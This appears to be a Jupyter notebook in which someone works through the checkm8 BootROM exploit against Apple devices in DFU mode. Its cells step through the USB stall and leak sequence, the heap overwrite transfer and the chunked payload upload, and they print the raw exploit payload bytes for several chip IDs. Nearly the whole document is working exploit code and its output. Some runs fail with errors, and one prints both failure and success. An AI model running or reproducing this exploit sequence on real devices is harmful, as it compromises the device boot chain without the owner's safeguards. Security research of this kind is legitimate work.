In [1]:
%load_ext autoreload

%autoreload 2

In [2]:
import checkm8, dfu, time

In [3]:
from checkm8 import all_exploit_configs, payload, \
stall, no_leak, leak, libusb1_async_ctrl_transfer, libusb1_no_error_ctrl_transfer, \
usb_req_stall, usb_req_leak, usb_req_no_leak

In [19]:
# from checkm8 import exploit_config
def exploit_config(serial_number):
  for config in all_exploit_configs():
    if 'SRTG:[%s]' % config.version in serial_number:
      return payload(config.cpid), config

In [6]:
checkm8.exploit()

*** checkm8 exploit by axi0mX ***
Found: CPID:8000 CPRV:20 CPFM:03 SCEP:01 BDID:02 ECID:00000XXXXXXXXXXX IBFL:1C SRTG:[iBoot-2234.0.0.3.3]
ERROR: This is not a compatible device. Exiting.


SystemExit: 1

In [66]:
  print '*** checkm8 exploit by axi0mX ***'

  device = dfu.acquire_device()
  start = time.time()
  print 'Found:', device.serial_number
  if 'PWND:[' in device.serial_number:
    print 'Device is already in pwned DFU Mode. Not executing exploit.'

*** checkm8 exploit by axi0mX ***
Found: CPID:8000 CPRV:20 CPFM:03 SCEP:01 BDID:02 ECID:00000XXXXXXXXXXX IBFL:1C SRTG:[iBoot-2234.0.0.3.3]


In [91]:
#   payload, config = exploit_config(device.serial_number)
pl, config = exploit_config("SRTG:[iBoot-2696.0.0.1.33]")
#     T8010
print(config)
print(repr(pl))

	version: 	iBoot-2696.0.0.1.33
	cpid: 	0x8010
	large_leak: 	None
	overwrite: 	length: 1524
	hole: 	5
	leak: 	1
'\x13\x00\x80\xd2\xfd{\xbf\xa9\xfd\x03\x00\x91\xe0\x07\x00X\x00\x04@\xa9\x02\x06\x00\x10C\x10@\xa9\x03\x10\x00\xa9#\x10\x00\xa9C\x10A\xa9\x03\x10\x01\xa9#\x10\x01\xa9\x00\x07\x00X\x00\x04\x00\x91\x01\x00@9\xc1\xff\xff5\xa1\x05\x00\x10"\x0c@\xa9\x02\x0c\x00\xa9 \x06\x00XA\x06\x00X \x00?\xd6A\x06\x00X \x00\x009@\x06\x00X\xe1\xfc\xff\x10B\x06\x00X!\x00\x02\x8b\x02\x00\x80\xd2#\x06\x00XD\x06\x00X\x05`\x00\x91\x85\x00\x00\xf9#\x10@\xa9\x03\x10\x00\xa9#\x10A\xa9\x03\x10\x01\xa9#\x10B\xa9\x03\x10\x02\xa9#\x10C\xa9\x03\x10\x03\xa9 ~\x0b\xd5\xbf?\x03\xd5\x00\x00\x01\x91!\x00\x01\x91B\x00\x01\x91_\x00\x03\xebC\xfe\xffT\x1fu\x08\xd5\x9f?\x03\xd5\xdf?\x03\xd5\xfd{\xc1\xa8\xc0\x03_\xd6\t\x02\x19\x00\x01\x01\x05\x80\xfa\t\x04\x00\x00\x00\xfe\x01\x00\x00\x07!\x01\n\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00 PWND:[checkm8]\x00\x1f \x03\xd50\x8a\x08\x80\x01\x00\x00\x00\xf8<\x08\x80\x01\x00\x00\x0

In [41]:
device.serial_number

u'CPID:8000 CPRV:20 CPFM:03 SCEP:01 BDID:02 ECID:00000XXXXXXXXXXX IBFL:1C SRTG:[iBoot-2234.0.0.3.3]'

In [99]:
  if config.large_leak is not None:
    usb_req_stall(device)
    for i in range(config.large_leak):
      usb_req_leak(device)
    usb_req_no_leak(device)
  else:
    stall(device)
    for i in range(config.hole):
      no_leak(device)
    leak(device)
    no_leak(device)
  dfu.usb_reset(device)
  dfu.release_device(device)

In [107]:
  device = dfu.acquire_device()
  device.serial_number
  libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
  libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
  dfu.release_device(device)

  time.sleep(0.5)


In [115]:
  device = dfu.acquire_device()
  usb_req_stall(device)
  if config.large_leak is not None:
    usb_req_leak(device)
  else:
    for i in range(config.leak):
      usb_req_leak(device)
  libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 50)
  for i in range(0, len(pl), 0x800):
    libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, pl[i:i+0x800], 50)
  dfu.usb_reset(device)
  dfu.release_device(device)

In [119]:
  device = dfu.acquire_device()
  if 'PWND:[checkm8]' not in device.serial_number:
    print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
#     sys.exit(1)
  else:
    print 'Device is now in pwned DFU Mode.'
#   print '(%0.2f seconds)' % (time.time() - start)
    dfu.release_device(device)


ERROR: Exploit failed. Device did not enter pwned DFU Mode.
Device is now in pwned DFU Mode.


In [90]:
  for config in all_exploit_configs():
        print(config)
        print('\tpayload:\t' + repr(payload(config.cpid)) + '\n')

	version: 	iBoot-1458.2
	cpid: 	0x8947
	large_leak: 	626
	overwrite: 	length: 1660
	hole: 	None
	leak: 	None
	payload:	'\x00@\xa0\xe3\xf0@-\xe9D\x01\x9f\xe5\xd0\x00\xc0\xe1C/\x8f\xe2\xd0@\xc2\xe1\xf0@\xc0\xe1\xf0@\xc1\xe1\xd8@\xc2\xe1\xf8@\xc0\xe1\xf8@\xc1\xe1\xd0A\xc2\xe1\xf0A\xc0\xe1\xf0A\xc1\xe1\xd8A\xc2\xe1\xf8A\xc0\xe1\xf8A\xc1\xe1\x0c\x01\x9f\xe5\x01\x00\x80\xe2\x00\x10\xd0\xe5\x00\x00Q\xe3\xfb\xff\xff\x1a\xe4\x10\x8f\xe2\x00 \x91\xe5\x040\x91\xe5\x00 \x80\xe5\x040\x80\xe5\x08 \x91\xe5\x0c0\x91\xe5\x08 \x80\xe5\x0c0\x80\xe5\xd4\x00\x9f\xe5\xd4\x10\x9f\xe5\xd4@\x9f\xe51\xff/\xe1\x00\x00\xc4\xe5\xcc\x00\x9f\xe5\x9c\x10O\xe2\xc8 \x9f\xe5\x02\x10\x81\xe0\x00 \xa0\xe3\xc00\x9f\xe5\xc0@\x9f\xe5\tP\x80\xe2\x00P\x84\xe5\xd0@\xc1\xe1\xf0@\xc0\xe1\xd8@\xc1\xe1\xf8@\xc0\xe1\xd0A\xc1\xe1\xf0A\xc0\xe1\xd8A\xc1\xe1\xf8A\xc0\xe1\xd0B\xc1\xe1\xf0B\xc0\xe1\xd8B\xc1\xe1\xf8B\xc0\xe1\xd0C\xc1\xe1\xf0C\xc0\xe1\xd8C\xc1\xe1\xf8C\xc0\xe1>\x0f\x07\xee_\xf0\x7f\xf5@\x00\x80\xe2@\x10\x81\xe2@ \x82\xe2\x0

In [51]:
# import struct
# '\0' * 0x660 + struct.pack('<20xI4x', 0x34000000)

2048

In [7]:
for config in reversed(all_exploit_configs()):
  print '*** checkm8 exploit by axi0mX ***'
  device = dfu.acquire_device()
  print 'Found:', device.serial_number
  pl = payload(config.cpid)
  print(config)
  print('\tpayload:\t' + repr(pl) + '\n')
  if config.large_leak is not None:
    usb_req_stall(device)
    for i in range(config.large_leak):
      usb_req_leak(device)
    usb_req_no_leak(device)
  else:
    stall(device)
    for i in range(config.hole):
      no_leak(device)
    leak(device)
    no_leak(device)
  dfu.usb_reset(device)
  dfu.release_device(device)
  
  device = dfu.acquire_device()
  usb_req_stall(device)
  if config.large_leak is not None:
    usb_req_leak(device)
  else:
    for i in range(config.leak):
      usb_req_leak(device)
  libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 50)
  for i in range(0, len(pl), 0x800):
    libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, pl[i:i+0x800], 50)
  dfu.usb_reset(device)
  dfu.release_device(device)
  
  device = dfu.acquire_device()
  if 'PWND:[checkm8]' not in device.serial_number:
    print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
#     sys.exit(1)
  else:
    print 'Device is now in pwned DFU Mode.'
#   print '(%0.2f seconds)' % (time.time() - start)
    dfu.release_device(device)


*** checkm8 exploit by axi0mX ***
Found: CPID:8000 CPRV:20 CPFM:03 SCEP:01 BDID:02 ECID:00000XXXXXXXXXXX IBFL:1C SRTG:[iBoot-2234.0.0.3.3]
	version: 	iBoot-3332.0.0.1.23
	cpid: 	0x8015
	large_leak: 	None
	overwrite: 	length: 1408
	hole: 	6
	leak: 	1
	payload:	'\xf8\x03\x02\x80\x01\x00\x00\x00\xa5\x06\x00\x00\x01\x00\x00\x00\xf8\x05\x02\x80\x01\x00\x00\x00%\x06\x00\x80\x01\x00\x00\x00\xf8\xc5\x00\x80\x01\x00\x00\x00%\x06\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\xa9\x00\x00\x01\x00\x00\x000\xc0\x01\x80\x01\x00\x00\x00\xac\xa9\x00\x00\x01\x00\x00\x00@\xc0\x01\x80\x01\x00\x00\x00\xac\xa9\x00\x00\x01\x00\x00\x00P\xc0\x01\x80\x01\x00\x00\x00\xac\xa9\x00\x00\x01\x00\x00\x00`\xc0\x01\x80\x01\x00\x00\x00\xac\xa9\x00\x00\x01\x00\x00\x00\xc0\xc0\x01\x80\x01\x00\x00\x00\x00\xc8\x01\x80\x01\x00\x00\x00\xd0\x04\x00\x00\x01\x00\x00\x00@\xc8\x01\x80\x01\x00\x00\x00\xd0\x04\x00\x00\x01\x00\x00\x00\x80\xc8\x01\x80\x01\x00\x00\x00\xd0\x04\x00\x00\x01\x00

SystemExit: 1

In [11]:
device = dfu.acquire_device()

ERROR: No Apple device in DFU Mode 0x1227 detected after 5.00 second timeout. Exiting.


SystemExit: 1

In [ ]:
dfu.release_device(device)